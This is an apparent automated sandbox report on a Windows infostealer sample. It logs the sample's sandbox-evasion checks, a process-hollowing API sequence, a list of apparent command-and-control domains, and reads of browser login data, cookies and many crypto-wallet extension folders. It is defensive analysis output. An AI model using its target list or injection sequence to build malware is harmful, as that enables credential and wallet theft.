              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: X2hna87N3Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: X2hna87N3Y.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: X2hna87N3Y.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: X2hna87N3Y.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: X2hna87N3Y.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: X2hna87N3Y.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: X2hna87N3Y.exeStatic PE information: section name: .CODE
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8B97A push ecx; ret 0_2_00D8B98D
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00438960 push eax; mov dword ptr [esp], 04050607h2_2_0043896E
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B4A0 push eax; mov dword ptr [esp], 929190CFh2_2_0043B4A1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8B97A push ecx; ret 2_2_00D8B98D
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeAPI coverage: 9.7 %
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe TID: 7552Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe TID: 7552Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D9D358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D9D358
              Source: X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967856629.0000000000F87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
              Source: X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967856629.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000F4C000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968844301.0000000000F4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00439DF0 LdrInitializeThunk,2_2_00439DF0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DB21A9 mov edi, dword ptr fs:[00000030h]0_2_00DB21A9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DB55D0 mov edi, dword ptr fs:[00000030h]0_2_00DB55D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00DB55D0 mov edi, dword ptr fs:[00000030h]2_2_00DB55D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D98D25 GetProcessHeap,0_2_00D98D25
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8B290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D8B290
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8B64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8B64C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8B640 SetUnhandledExceptionFilter,0_2_00D8B640
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8B290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00D8B290
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8B64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D8B64C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8B640 SetUnhandledExceptionFilter,2_2_00D8B640

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DB21A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00DB21A9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeMemory written: C:\Users\user\Desktop\X2hna87N3Y.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tacitglibbr.biz
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"Jump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D9C8FD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,0_2_00D9806C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,0_2_00D9C862
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,0_2_00D9CBAF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,0_2_00D9CB50
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,0_2_00D9CCCF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,0_2_00D9CC84
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D9CD76
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,0_2_00D9CE7C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D9C611
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,0_2_00D98610
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00D9C8FD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,2_2_00D9806C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,2_2_00D9C862
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,2_2_00D9CBAF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,2_2_00D9CB50
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,2_2_00D9CCCF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,2_2_00D9CC84
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00D9CD76
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetLocaleInfoW,2_2_00D9CE7C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00D9C611
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: EnumSystemLocalesW,2_2_00D98610
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8C367 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D8C367
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: X2hna87N3Y.exe, 00000002.00000003.1909555622.0000000003847000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\\Electrum\\wallets","m
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %\\ElectronCash\
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: },{"t":0,"p":"%appdata%\\com.liberty.jaxx\\Index
              Source: X2hna87N3Y.exe, 00000002.00000003.1865922342.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: X2hna87N3Y.exe, 00000002.00000003.1865922342.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ["keystore"],"z":"Wallets/Etherezn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
